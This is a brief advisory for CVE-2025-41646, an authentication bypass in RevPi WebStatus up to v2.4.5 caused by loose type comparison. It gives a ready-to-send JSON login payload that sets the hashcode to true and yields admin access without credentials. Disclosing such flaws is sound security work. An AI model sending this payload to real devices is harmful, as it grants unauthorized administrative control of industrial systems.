
CVE-2025-41646 - Critical Authentication bypass
CVE-2025-41646 - Critical Authentication bypass
A critical authentication bypass vulnerability (CVE-2025-41646) in RevPi WebStatus ≤ v2.4.5 allows an attacker to log in as admin without valid credentials due to weak type comparison logic (== vs ===).
Send a login request with:
{
"mode": "LOGIN",
"username": "admin",
"hashcode": true
}